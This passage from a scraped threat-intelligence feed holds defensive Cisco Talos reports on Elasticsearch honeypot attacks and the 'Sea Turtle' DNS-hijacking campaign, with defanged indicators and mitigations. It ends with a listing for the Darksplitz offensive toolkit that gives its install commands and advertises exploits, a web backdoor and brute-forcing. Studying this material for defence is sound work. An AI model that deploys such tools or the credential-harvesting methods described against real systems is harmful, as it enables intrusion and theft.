attacker's Gitee page. Gitee is a Chinese code-sharing website similar to Github or Atlassian. \n \n \n\n\n_Attacker's Gitee page._\n\n \n\n\nAlthough the projects associated with this Gitee profile are not explicitly malicious, Talos has linked this QQ account to a profile on Chinese hacking forum xiaoqi7, as well as a history of posts on topics related to exploits and malware on other forums. We briefly reviewed the public account activity of 952135763 and found several posts related to cyber security and exploitation, but nothing specific to this activity. While this information could tell us more about the attacker, there is insufficient information currently to draw any firm conclusions. \n \nOur honeypots also detected additional hosts exploiting Elasticsearch to drop payloads that execute both \"echo 'qq952135763'\" and \"echo '952135763,'\" suggesting that the attacks are related to the same QQ account. However, none of the IPs associated with these attacks have been observed attempting to download the \"LinuxT\" payload linked to this attacker. Additionally, unlike other activity associated with this attacker, these attacks leveraged the newer Elasticsearch vulnerability rather than the older one. \n \nThe three remaining actors that Talos identified have not been observed delivering any malware through their exploits. One actor issued an \"rm *\" command, while the other two actors were fingerprinting vulnerable servers by issuing 'whoami' and 'id' commands. \n \n\n\n## Conclusion\n\n \nTalos has observed multiple attackers exploiting CVE-2014-3120 and CVE-2015-1427 in our Elasticsearch honeypots to drop a variety of malicious payloads. Additionally, Talos has identified some social media accounts we believe could belong to the threat actor dropping the \"LinuxT\" payload. These Elasticsearch vulnerabilities only exist in versions 1.4.2 and lower, so any cluster running a modern version of Elasticsearch is unaffected by these vulnerabilities. Given the size and sensitivity of the data sets these clusters contain, the impact of a breach of this nature could be severe. Talos urges readers to patch and upgrade to a newer version of Elasticsearch if at all possible. Additionally, Talos highly recommends disabling the ability to send scripts through search queries if that ability is not strictly necessary for your use cases. \n \n\n\n## Coverage\n\n \nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \n**CVE-2014-3120:** 33830, 36256, 44690 \n \n**CVE-2015-1427:** 33814,36067 \n \n**CVE-2017-10271:** 45304 \n \n**CVE-2018-7600:** 46316 \n \n**CVE-2018-1273:** 46473 \n \nAdditional ways our customers can detect and block this threat are listed below. \n \n \nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nEmail Security can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat. \n \nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. \n \nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \n\n\n## IOCs:\n\n \n**First Actor:** \n \n**Attacking IP addresses:** \n \n101[.]200[.]48[.]68 \n117[.]205[.]7[.]194 \n107[.]182[.]183[.]206 \n124[.]43[.]19[.]159 \n139[.]99[.]131[.]57 \n179[.]50[.]196[.]228 \n185[.]165[.]116[.]144 \n189[.]201[.]192[.]242 \n191[.]189[.]30[.]112 \n192[.]210[.]198[.]50 \n195[.]201[.]169[.]194 \n216[.]15[.]146[.]34 \n43[.]240[.]65[.]121 \n45[.]76[.]136[.]196 \n45[.]76[.]178[.]34 \n52[.]8[.]60[.]118 \n54[.]70[.]161[.]251 \n139[.]159[.]218[.]82 \n \n**IP addresses and ports hosting malware:** \n \n45[.]76[.]122[.]92:8506 \n207[.]148[.]70[.]143:8506 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 e2f1be608c2cece021e68056f2897d88ed855bafd457e07e62533db6dfdc00dc \n191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c \n2bcc9fff40053ab356ddde6de55077f8bf83d8dfa6d129c250f521eb170dc123 \n9a181c6a1748a9cfb46751a2cd2b27e3e742914873de40402b5d40f334d5448c 5fe3b0ba0680498dbf52fb8f0ffc316f3a4d7e8202b3ec710b2ae63e70c83b90 \n7b08a8dae39049aecedd9679301805583a77a4271fddbafa105fa3b1b507baa3 \n \n**Second Actor:** \n \n**Attacking IP address:** \n \n202[.]109[.]143[.]110 \n \n**IP address and port hosting malware:** \n \n216[.]176[.]179[.]106:9090 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 \n \n**Third Actor:** \n \n**Attacking IP addresses:** \n \n125[.]231[.]139[.]75 \n36[.]235[.]171[.]244 \n \n**IP addresses linked to QQ account, but not delivering malware:** \n \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n**IP address and port hosting malware:** \n \n104[.]203[.]170[.]198:5522 \n \n**SHA256 of malware hosted on above IP address:** \n \n7f18c8beb8e37ce41de1619b2d67eb600ace062e23ac5a5d9a9b2b3dfaccf79b dac92c84ccbb88f058b61deadb34a511e320affa7424f3951169cba50d700500 e5a04653a3bfbac53cbb40a8857f81c8ec70927a968cb62e32fd36143a6437fc d3447f001a6361c8454c9e560a6ca11e825ed17f63813074621846c43d6571ba 709d04dd39dd7f214f3711f7795337fbb1c2e837dddd24e6d426a0d6c306618e 830db6a2a6782812848f43a4e1229847d92a592671879ff849bc9cf08259ba6a \n \n**Remaining actors:** \n \n**Attacking IP addresses:** \n \n111[.]19[.]78[.]4 \n15[.]231[.]235[.]194 \n221[.]203[.]81[.]226 \n111[.]73[.]45[.]90 \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n\n\n", "cvss3": {}, "published": "2019-02-26T10:56:00", "type": "talosblog", "title": "Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-1273", "CVE-2018-7600"], "modified": "2019-03-01T15:56:50", "id": "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uGLhJU8rCm8/cisco-talos-honeypot-analysis-reveals.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-04-24T16:19:06", "description": "[](<https://3.bp.blogspot.com/-ksOHISXuYNU/XLX7wzGSHNI/AAAAAAAAAgI/Ffst6mMQLNIBQP1F1gRMNCYEu2-jdZr6ACEwYBhgL/s1600/image2.jpg>)\n\n \n \n_Authors: [Danny Adamitis](<https://twitter.com/dadamitis>), [David Maynor](<https://twitter.com/Dave_Maynor>), [Warren Mercer](<https://twitter.com/SecurityBeard>), [Matthew Olney ](<https://twitter.com/kpyke>)and [Paul Rascagneres](<https://twitter.com/r00tbsd>)._ \n_ \n_ \n_Update 4/18: _A correction has been made to our research based on feedback from Packet Clearing House, we thank them for their assistance \n \n\n\n## Preface\n\nThis blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has the potential to undermine the trust users have on the internet. That trust and the stability of the DNS system as a whole drives the global economy. Responsible nations should avoid targeting this system, work together to establish an accepted global norm that this system and the organizations that control it are off-limits, and cooperate in pursuing those actors who act irresponsibly by targeting this system. \n \n \n\n\n## Executive Summary\n\nCisco Talos has discovered a new cyber threat campaign that we are calling \"Sea Turtle,\" which is targeting public and private entities, including national security organizations, located primarily in the Middle East and North Africa. The ongoing operation likely began as early as January 2017 and has continued through the first quarter of 2019. Our investigation revealed that at least 40 different organizations across 13 different countries were compromised during this campaign. We assess with high confidence that this activity is being carried out by an advanced, state-sponsored actor that seeks to obtain persistent access to sensitive networks and systems. \n \nThe actors behind this campaign have focused on using DNS hijacking as a mechanism for achieving their ultimate objectives. DNS hijacking occurs when the actor can illicitly modify DNS name records to point users to actor-controlled servers. The Department of Homeland Security (DHS) issued an [alert](<https://www.us-cert.gov/ncas/alerts/AA19-024A>) about this activity on Jan. 24 2019, warning that an attacker could redirect user traffic and obtain valid encryption certificates for an organization's domain names. \n \nIn the Sea Turtle campaign, Talos was able to identify two distinct groups of victims. The first group, we identify as primary victims, includes national security organizations, ministries of foreign affairs, and prominent energy organizations. The threat actor targeted third-party entities that provide services to these primary entities to obtain access. Targets that fall into the secondary victim category include numerous DNS registrars, telecommunication companies, and internet service providers. One of the most notable aspects of this campaign was how they were able to perform DNS hijacking of their primary victims by first targeting these third-party entities. \n \nWe assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage, which we [reported](<https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html>) on in November 2018. The Sea Turtle campaign almost certainly poses a more severe threat than DNSpionage given the actor's methodology in targeting various DNS registrars and registries. The level of access we presume necessary to engage in DNS hijacking successfully indicates an ongoing, high degree of threat to organizations in the targeted regions. Due to the effectiveness of this approach, we encourage all organizations, globally, to ensure they have taken steps to minimize the possibility of malicious actors duplicating this attack methodology. \n \nThe threat actors behind the Sea Turtle campaign show clear signs of being highly capable and brazen in their endeavors. The actors are responsible for the first [publicly confirmed](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) case against an organizations that manages a root server zone, highlighting the attacker's sophistication. Notably, the threat actors have continued their attacks despite public reports documenting various aspects of their activity, suggesting they are unusually brazen and may be difficult to deter going forward. In most cases, threat actors typically stop or slow down their activities once their campaigns are publicly revealed. \n \nThis post provides the technical findings you would typically see in a Talos blog. We will also offer some commentary on the threat actor's tradecraft, including possible explanations about the actor's attack methodology and thought process. Finally, we will share the IOCs that we have observed thus far, although we are confident there are more that we have not seen. \n \n\n\n### Background on Domain Name Services and records management\n\nThe threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space. This section provides a brief overview of where DNS records are managed and how they are accessed to help readers better understand how these events unfolded. \n \nThe first and most direct way to access an organization's DNS records is through the registrar with the registrant's credentials. These credentials are used to login to the DNS provider from the client-side, which is a registrar. If an attacker was able to compromise an organization's network administrator credentials, the attacker would be able to change that particular organization's DNS records at will. \n \nThe second way to access DNS records is through a DNS registrar, sometimes called registrar operators. A registrar sells domain names to the public and manages DNS records on behalf of the registrant through the domain registry. Records in the domain registry are accessed through the registry application using the Extensible Provisioning Protocol (EPP). EPP was detailed in the [request for comment (RFC) 5730](<https://tools.ietf.org/html/rfc5730>) as \"a means of interaction between a registrar's applications and registry applications.\" If the attackers were able to obtain one of these EPP keys, they would be able to modify any DNS records that were managed by that particular registrar. \n \nThe third approach to gain access to DNS records is through one of the registries. These registries manage any known TLD, such as entire country code top-level domains (ccTLDs) and generic top-level domains (gTLDs). For example, Verisign manages all entities associated with the top-level domain (TLD) \".com.\" All the different registry information then converges into one of [12 different](<https://www.iana.org/domains/root/servers>) organization that manage different parts of the domain registry root. The domain registry root is stored on 13 \"named authorities in the delegation data for the root zone,\" according to [ICANN](<https://www.icann.org/news/blog/there-are-not-13-root-servers>). \n \nFinally, actors could target root zone servers to modify the records directly. It is important to note that there is no evidence during this campaign (or any other we are aware of) that the root zone servers were attacked or compromised. We highlight this as a potential avenue that attackers would consider. The root DNS servers issued a [joint statement](<https://root-servers.org/news/20190314-Rootops_statement_Integrity_of_root_server_system.pdf>) that stated, \"There are no signs of lost integrity or compromise of the content of the root [server] zone\u2026There are no signs of clients having received unexpected responses from root servers.\" \n\n\n### Assessed Sea Turtle DNS hijacking methodology\n\nIt is important to remember that the DNS hijacking is merely a means for the attackers to achieve their primary objective. Based on observed behaviors, we believe the actor ultimately intended to steal credentials to gain access to networks and systems of interest. To achieve their goals, the actors behind Sea Turtle: \n\n\n 1. Established a means to control the DNS records of the target.\n 2. Modified DNS records to point legitimate users of the target to actor-controlled servers.\n 3. Captured legitimate user credentials when users interacted with these actor-controlled servers.\nThe diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals. \n \n\n\n### Redirection Attack Methodology Diagram\n\n[](<http://2.bp.blogspot.com/-FQg4Ak28yDc/XLdL-8NlekI/AAAAAAAAAXw/wDpJRiXAEGEzPJo9bQ9PxqOG8rcGn6gWACK4BGAYYCw/s1600/DNSpionage-methodology-v2.png>)\n\n \n\n\n### Operational tradecraft\n\n#### Initial access\n\nThe threat actors behind the Sea Turtle campaign gained initial access either by exploiting known vulnerabilities or by sending spear-phishing emails. Talos believes that the threat actors have exploited multiple known CVEs to either gain initial access or to move laterally within an affected organization. Based on our research, we know the actor utilizes the following known exploits: \n\n\n * [CVE-2009-1151](<https://nvd.nist.gov/vuln/detail/CVE-2009-1151>): PHP code injection vulnerability affecting phpMyAdmin\n * [CVE-2014-6271](<https://nvd.nist.gov/vuln/detail/CVE-2014-6271>): RCE affecting GNU bash system, specifically the SMTP (this was part of the [Shellshock](<https://www.us-cert.gov/ncas/alerts/TA14-268A>) CVEs)\n * [CVE-2017-3881](<https://nvd.nist.gov/vuln/detail/CVE-2017-3881>): RCE by unauthenticated user with elevated privileges Cisco switches\n * [CVE-2017-6736](<https://nvd.nist.gov/vuln/detail/CVE-2017-6736>): Remote Code Exploit (RCE) for Cisco integrated Service Router 2811\n * [CVE-2017-12617](<https://nvd.nist.gov/vuln/detail/CVE-2017-12617>): RCE affecting Apache web servers running Tomcat\n * [CVE-2018-0296](<https://nvd.nist.gov/vuln/detail/CVE-2018-0296>): Directory traversal allowing unauthorized access to Cisco Adaptive Security Appliances (ASAs) and firewalls\n * [CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>): RCE for Website built with Drupal, aka \"Drupalgeddon\"\nAs of early 2019, the only evidence of the spear-phishing threat vector came from a compromised organization's public disclosure. On January 4, Packet Clearing House, which is not an Internet exchange point but rather is an NGO which provides support to Internet exchange points and the core of the domain name system, provided confirmation of this aspect of the actors\u2019 tactics when it publicly revealed its internal DNS had been briefly hijacked as a consequence of the compromise at its domain registrar. \n \nAs with any initial access involving a sophisticated actor, we believe this list of CVEs to be incomplete. The actor in question can leverage known vulnerabilities as they encounter a new threat surface. This list only represents the observed behavior of the actor, not their complete capabilities. \n\n\n### Globalized DNS hijacking activity as an infection vector\n\nDuring a typical incident, the actor would modify the NS records for the targeted organization, pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries. The amount of time that the targeted DNS record was hijacked can range from a couple of minutes to a couple of days. This type of activity could give an attacker the ability to redirect any victim who queried for that particular domain around the world. [Other cybersecurity firms](<https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/>) previously reported some aspects of this activity. Once the actor-controlled name server was queried for the targeted domain, it would respond with a falsified \"A\" record that would provide the IP address of the actor-controlled MitM node instead of the IP address of the legitimate service. In some instances, the threat actors modified the time-to-live (TTL) value to one second. This was likely done to minimize the risk of any records remaining in the DNS cache of the victim machine. \n \nDuring 2019, we observe the following name servers being used in support of the Sea Turtle campaign: \n \n\n\n \n\n\n \n\n\nDomain\n\n| \n\nActive Timeframe \n \n---|--- \n \nns1[.]intersecdns[.]com\n\n| \n\nMarch - April 2019 \n \nns2[.]intersecdns[.]com\n\n| \n\nMarch - April 2019 \n \nns1[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n \nns2[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n \n \n\n\n \n\n\n### Credential harvesting: Man-in-the-middle servers\n\nOnce the threat actors accessed a domain's DNS records, the next step was to set up a man-in-the-middle (MitM) framework on an actor-controlled server. \n \nThe next step for the actor was to build MitM servers that impersonated legitimate services to capture user credentials. Once these credentials were captured, the user would then be passed to the legitimate service. to evade detection, the actors performed \"certificate impersonation,\" a technique in which the attacker obtained a certificate authority-signed X.509 certificate from another provider for the same domain imitating the one already used by the targeted organization. For example, if a DigiCert certificate protected a website, the threat actors would obtain a certificate for the same domain but from another provider, such as Let's Encrypt or Comodo. This tactic would make detecting the MitM attack more difficult, as a user's web browser would still display the expected \"SSL padlock\" in the URL bar. \n \nWhen the victim entered their password into the attacker's spoofed webpage, the actor would capture these credentials for future use. The only indication a victim received was a brief lag between when the user entered their information and when they obtained access to the service. This would also leave almost no evidence for network defenders to discover, as legitimate network credentials were used to access the accounts. \n \nIn addition to the MitM server IP addresses published in previous reports, Talos identified 16 additional servers leveraged by the actor during the observed attacks. The complete list of known malicious IP addresses are in the Indicators of Compromise (IOC) section below. \n\n\n### Credential harvesting with compromised SSL certificates\n\nOnce the threat actors appeared to have access to the network, they stole the organization's SSL certificate. The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials. This allowed the actors to expand their access into the targeted organization's network. The stolen certificates were typically only used for less than one day, likely as an operational security measure. Using stolen certificates for an extended period would increase the likelihood of detection. In some cases, the victims were redirected to these actor-controlled servers displaying the stolen certificate. \n \nOne notable aspect of the campaign was the actors' ability to impersonate VPN applications, such as Cisco Adaptive Security Appliance (ASA) products, to perform MitM attacks. At this time, we do not believe that the attackers found a new ASA exploit. Rather, they likely abused the trust relationship associated with the ASA's SSL certificate to harvest VPN credentials to gain remote access to the victim's network. This MitM capability would allow the threat actors to harvest additional VPN credentials. \n \nAs an example, DNS records indicate that a targeted domain resolved to an actor-controlled MitM server. The following day, Talos identified an SSL certificate with the subject common name of \"ASA Temporary Self Signed Certificate\" associated with the aforementioned IP address. This certificate was observed on both the actor-controlled IP address and on an IP address correlated with the victim organization. \n \nIn another case, the attackers were able to compromise NetNod, a non-profit, independent internet infrastructure organization based in Sweden. NetNod acknowledged the compromise in a [public statement](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) on February 5, 2019. Using this access, the threat actors were able to manipulate the DNS records for sa1[.]dnsnode[.]net. This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa). It is likely that there are additional Saudi Arabia-based victims from this attack. \n \nIn one of the more recent campaigns on March 27, 2019, the threat actors targeted the Sweden-based consulting firm Cafax. On Cafax's [public webpage](<http://www.cafax.se/Home.html>), the company states that one of their consultants actively manages the i[.]root-server[.]net zone. NetNod managed this particular DNS server zone. We assess with high confidence that this organization was targeted in an attempt to re-establish access to the NetNod network, which was previously compromised by this threat actor. \n\n\n### Primary and secondary victims\n\n[](<https://4.bp.blogspot.com/-NQC457__bD8/XLX7w7QGGOI/AAAAAAAAAgA/3nx4TTK6U1oHms5gRhGQRaw6TGmTo1H-ACEwYBhgL/s1600/image1.jpg>)\n\n \n \nWe identified 40 different organizations that have been targeted during this campaign. The victim organizations appear to be broadly grouped into two different categories. The first group of victims, which we refer to as primary victims, were almost entirely located in the Middle East and North Africa. Some examples of organizations that were compromised include: \n\n\n * Ministries of foreign affairs\n * Military organizations\n * Intelligence agencies\n * Prominent energy organizations\nThe second cluster of victim organizations were likely compromised to help enable access to these primary targets. These organizations were located around the world; however, they were mostly concentrated in the Middle East and North Africa. Some examples of organizations that were compromised include: \n\n\n * Telecommunications organizations\n * Internet service providers\n * Information technology firms\n * Registrars\n * One registry\n \nNotably, the threat actors were able to gain access to registrars that manage ccTLDs for Amnic, which is listed as the technical contact on [IANA](<https://www.iana.org/domains/root/db/am.html>) for the ccTLD .am. Obtaining access to this ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs. \n\n\n### How is this tradecraft different?\n\nThe threat actors behind the Sea Turtle campaign have proven to be highly capable, as they have been able to perform operations for over two years and have been undeterred by public reports documenting various aspects of their activity. This cyber threat campaign represents the first known case of a domain name registry organization that was compromised for cyber espionage operations. \n \nIn order to distinguish this activity from the previous reporting on other attackers, such as those affiliated with DNSpionage, below is a list of traits that are unique to the threat actors behind the Sea Turtle campaign: \n\n\n * These actors perform DNS hijacking through the use of actor-controlled name servers.\n * These actors have been more aggressive in their pursuit targeting DNS registries and a number of registrars, including those that manage ccTLDs.\n * These actors use Let's Encrypts, Comodo, Sectigo, and self-signed certificates in their MitM servers to gain the initial round of credentials.\n * Once they have access to the network, they steal the organization's legitimate SSL certificate and use it on actor-controlled servers.\n\n### Why was it so successful?\n\nWe believe that the Sea Turtle campaign continues to be highly successful for several reasons. First, the actors employ a unique approach to gain access to the targeted networks. Most traditional security products such as IDS and IPS systems are not designed to monitor and log DNS requests. The threat actors were able to achieve this level of success because the DNS domain space system added security into the equation as an afterthought. Had more ccTLDs implemented security features such as registrar locks, attackers would be unable to redirect the targeted domains. \n \nThe threat actors also used an interesting techniques called certificate impersonation. This technique was successful in part because the SSL certificates were created to provide confidentiality, not integrity. The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials, allowing the actors to gain access to the targeted network. \n \nThe threat actors were able to maintain long term persistent access to many of these networks by utilizing compromised credentials. \n \nWe will continue to monitor Sea Turtle and work with our partners to understand the threat as it continues to evolve to ensure that our customers remain protected and the public is informed. \n \n\n\n### Mitigation strategy\n\nIn order to best protect against this type of attack, we compiled a list of potential actions. Talos suggests using a registry lock service, which will require an out-of-band message before any changes can occur to an organization's DNS record. If your registrar does not offer a registry lock service, we recommend implementing multi-factor authentication, such as [DUO](<https://www.cisco.com/c/en/us/products/security/adaptive-multi-factor-authentication.html>), to access your organization's DNS records. If you suspect you were targeted by this type of activity intrusion, we recommend instituting a network-wide password reset, preferably from a computer on a trusted network. Lastly, we recommend applying patches, especially on internet-facing machines. Network administrators can monitor passive DNS record on their domains, to check for abnormalities. \n \n\n\n### Coverage\n\nCVE-2009-1151: PHP code injection vulnerability affecting phpMyAdmin \nSID: [2281](<https://snort.org/rule_docs/1-2281>) \n \nCVE-2014-6271: RCE affecting GNU bash system, specific the SMTP (this was part of the Shellshock CVEs) \nSID: [31975](<https://snort.org/rule_docs/1-31975>) \\- [31978](<https://snort.org/rule_docs/1-31978>), [31985](<https://snort.org/rule_docs/1-31985>), [32038](<https://snort.org/rule_docs/1-32038>), [32039](<https://snort.org/rule_docs/1-32039>), [32041](<https://snort.org/rule_docs/1-32041>) \\- [32043](<https://snort.org/rule_docs/1-32043>), [32069](<https://snort.org/rule_docs/1-32069>), [32335](<https://snort.org/rule_docs/1-32335>), [32336](<https://snort.org/rule_docs/1-32336>) \n \nCVE-2017-3881: RCE for Cisco switches \nSID: [41909](<https://snort.org/rule_docs/1-41909>) \\- [41910](<https://snort.org/rule_docs/1-41910>) \n \nCVE-2017-6736: Remote Code Exploit (RCE) for Cisco integrated Service Router 2811 \nSID: [43424](<https://snort.org/rule_docs/3-43424>) \\- [43432](<https://snort.org/rule_docs/3-43432>) \n \nCVE-2017-12617: RCE affecting Apache web servers running Tomcat \nSID: [44531](<https://snort.org/rule_docs/1-44531>) \n \nCVE-2018-0296: Directory traversal to gain unauthorized access to Cisco Adaptive Security Appliances (ASAs) and Firewalls \nSID: 46897 \n \nCVE-2018-7600: RCE for Website built with Drupal aka \"Drupalgeddon\" \nSID: [46316](<https://snort.org/rule_docs/1-46316>) \n\n\n### Indicators of Compromise\n\nThe threat actors utilized leased IP addresses from organizations that offer virtual private server (VPS) services. These VPS providers have since resold many of these IP addresses to various benign customers. To help network defenders, we have included the IP address, as well as the month(s) that the IP address was associated with the threat actor. \n \n** \n** \n\n\n**IP address**\n\n| \n\n**Month**\n\n| \n\n**Year**\n\n| \n\n**Country of targets** \n \n---|---|---|--- \n \n199.247.3.191\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nAlbania, Iraq \n \n37.139.11.155\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nAlbania, UAE \n \n185.15.247.140\n\n| \n\nJanuary\n\n| \n\n2018\n\n| \n\nAlbania \n \n206.221.184.133\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nEgypt \n \n188.166.119.57\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nEgypt \n \n185.42.137.89\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nAlbania \n \n82.196.8.43\n\n| \n\nOctober\n\n| \n\n2018\n\n| \n\nIraq \n \n159.89.101.204\n\n| \n\nDecember - January\n\n| \n\n2018-2019\n\n| \n\nTurkey, Sweden, Syria, Armenia, US \n \n146.185.145.202\n\n| \n\nMarch\n\n| \n\n2018\n\n| \n\nArmenia \n \n178.62.218.244\n\n| \n\nDecember - January\n\n| \n\n2018-2019\n\n| \n\nUAE, Cyprus \n \n139.162.144.139\n\n| \n\nDecember \n\n| \n\n2018\n\n| \n\nJordan \n \n142.54.179.69\n\n| \n\nJanuary - February \n\n| \n\n2017\n\n| \n\nJordan \n \n193.37.213.61\n\n| \n\nDecember\n\n| \n\n2018\n\n| \n\nCyprus \n \n108.61.123.149\n\n| \n\nFebruary\n\n| \n\n2019\n\n| \n\nCyprus \n \n212.32.235.160\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nIraq \n \n198.211.120.186\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nIraq \n \n146.185.143.158\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nIraq \n \n146.185.133.141\n\n| \n\nOctober\n\n| \n\n2018\n\n| \n\nLibya \n \n185.203.116.116\n\n| \n\nMay\n\n| \n\n2018\n\n| \n\nUAE \n \n95.179.150.92\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nUAE \n \n174.138.0.113\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nUAE \n \n128.199.50.175\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nUAE \n \n139.59.134.216\n\n| \n\nJuly - December\n\n| \n\n2018\n\n| \n\nUnited States, Lebanon \n \n45.77.137.65\n\n| \n\nMarch - April\n\n| \n\n2019\n\n| \n\nSyria, Sweden \n \n142.54.164.189\n\n| \n\nMarch - April\n\n| \n\n2019\n\n| \n\nSyria \n \n199.247.17.221\n\n| \n\nMarch \n\n| \n\n2019\n\n| \n\nSweden \n \n** \n** \n\n\nThe following list contains the threat actor name server domains and their IP address.\n\n \n\n\nDomain\n\n| \n\nActive Timeframe\n\n| \n\nIP address \n \n---|---|--- \n \nns1[.]intersecdns[.]com\n\n| \n\nMarch - April 2019\n\n| \n\n95.179.150.101 \n \nns2[.]intersecdns[.]com\n\n| \n\nMarch - April 2019\n\n| \n\n95.179.150.101 \n \nns1[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n\n| \n\n95.179.150.101 \n \nns2[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n\n| \n\n95.179.150.101 \n \n", "cvss3": {}, "published": "2019-04-18T16:08:25", "type": "talosblog", "title": "DNS Hijacking Abuses Trust In Core Internet Service", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2009-1151", "CVE-2014-6271", "CVE-2017-12617", "CVE-2017-3881", "CVE-2017-6736", "CVE-2018-0296", "CVE-2018-7600"], "modified": "2019-04-18T16:08:25", "id": "TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/GSxJP9GzlhI/seaturtle.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kitploit": [{"lastseen": "2022-04-07T12:04:01", "description": "[](<https://2.bp.blogspot.com/-WrSl3k8acz8/XKK-mOdvWPI/AAAAAAAAOaA/AhYa9ilCzBkxcfAhNbVH3l5YsgRSvL6tgCLcBGAs/s1600/Darksplitz.png>)\n\n \nThis tools is continued from Nefix, DirsPy and Xmasspy project. \n \n**Installation** \nWill work fine in the [debian](<https://www.kitploit.com/search/label/Debian> \"debian\" ) shade operating system, like Backbox, Ubuntu or Kali linux. \n\n\n 1. `$ git clone https://github.com/koboi137/darksplitz`\n 2. `$ cd darksplitz/`\n 3. `$ sudo ./install.sh`\n \n**Features** \n\n\n * Extract [mikrotik](<https://www.kitploit.com/search/label/MikroTik> \"mikrotik\" ) credential (user.dat)\n * Password generator\n * Reverse IP lookup\n * Mac address sniffer\n * Online md5 cracker\n * Mac address lookup\n * Collecting url from web.archive.org\n * Web [backdoor](<https://www.kitploit.com/search/label/Backdoor> \"backdoor\" ) (Dark Shell)\n * Winbox exploit (CVE-2018-14847)\n * ChimeyRed exploit for mipsbe (Mikrotik)\n * Exploit web application\n * Mass apple dos (CVE-2018-4407)\n * Libssh exploit (CVE-2018-10933)\n * Discovering Mikrotik device\n * Directory scanner\n * Subdomain scanner\n * Mac address scanner\n * Mac address pinger\n * Vhost [scanner](<https://www.kitploit.com/search/label/Scanner> \"scanner\" ) (bypass cloudflare)\n * Mass [bruteforce](<https://www.kitploit.com/search/label/Bruteforce> \"bruteforce\" ) (wordpress)\n * Interactive msfrpc client\n \n**Exploit web application** \n\n\n * plUpload file upload\n * jQuery file upload (CVE-2018-9206)\n * Laravel (.env)\n * sftp-config.json (misc)\n * Wordpress register (enable)\n * elfinder file upload\n * Drupal 7 exploit (CVE-2018-7600)\n * Drupal 8 exploit (CVE-2018-7600)\n * com_fabrik exploit (joomla)\n * gravityform plugin file upload (wordpress)\n * geoplace3 plugin file upload (wordpress)\n * peugeot-music plugin file upload (wordpress)\n \n**Notes** \nThis tool will work fine under root, because scapy module and other need root user to access more features. But you can run as user too in some features. ;) \n \n \n\n\n**[Download Darksplitz](<https://github.com/koboi137/darksplitz> \"Download Darksplitz\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": 